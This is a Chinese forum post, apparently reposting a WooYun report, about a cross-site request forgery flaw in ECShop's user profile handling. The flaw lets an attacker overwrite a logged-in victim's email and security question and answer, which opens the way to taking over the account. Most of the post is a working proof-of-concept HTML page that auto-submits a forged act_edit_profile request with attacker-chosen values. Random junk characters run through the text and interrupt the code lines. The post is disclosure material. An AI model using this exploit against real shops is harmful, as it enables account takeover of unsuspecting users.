找回密码
 立即注册
查看: 2931|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:
- ^( ?: @3 p( |' h+ q6 Gecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现. z6 s. A1 g% M$ v* \& N# f3 T) @
* ^$ i$ z$ B7 }9 Y
Demo For:http://www.wooyun.org/bug.php?action=view&id=395; E- t& ^4 g- n# }0 G2 H

! x& Y% A" n3 i1 I详细说明:
3 ~3 _, B6 p. y6 @9 _7 a利用csrf和xss可以突破官方所说的“障碍”! y; ?2 ]8 b# ]+ `, z* d! s
xss版本已经有人说明
) ^5 I1 M2 ^: T3 _+ n1 p这里给出csrf版本: Z* M% _, y0 g0 ]

8 p; O* F' v* u0 Z. p漏洞证明:0 d5 E8 K, s2 B& w2 p
<html>7 |; ~. i! V) j+ G2 C7 r
<body>
  b  E9 t& K# {" v4 @% _6 r6 }<form action="http://www.wooyun.org/ecshop/user.php" method="POST">. M, ]6 P  l/ w$ ]$ U' M
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
4 Z, R0 Y7 _8 X, W  i7 N0 ~% t! e<INPUT TYPE="text" NAME="act" value="act_edit_profile">
6 }4 b. }$ }3 q$ D<INPUT TYPE="text" NAME="sel_question" value="ecshop">! E0 x) r, n6 X% R' i
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">3 T- r( c) ?$ R" a
</body>
5 a7 A, s. I/ Y. \6 ^<script>
. s5 q# d6 M% K* N% i% b8 L" sdocument.forms[0].submit();
! \9 F( t  Y( e7 e</script>) L5 T! T, q2 O- T. o7 e0 R6 J
</html>
7 ?8 H3 E7 X2 x9 S. f5 ?2 v" m! h. w构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失6 r9 p# e; q$ ?: m& Q/ F& Z2 J
* @5 p: c+ |6 s+ _. g) z( ?
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表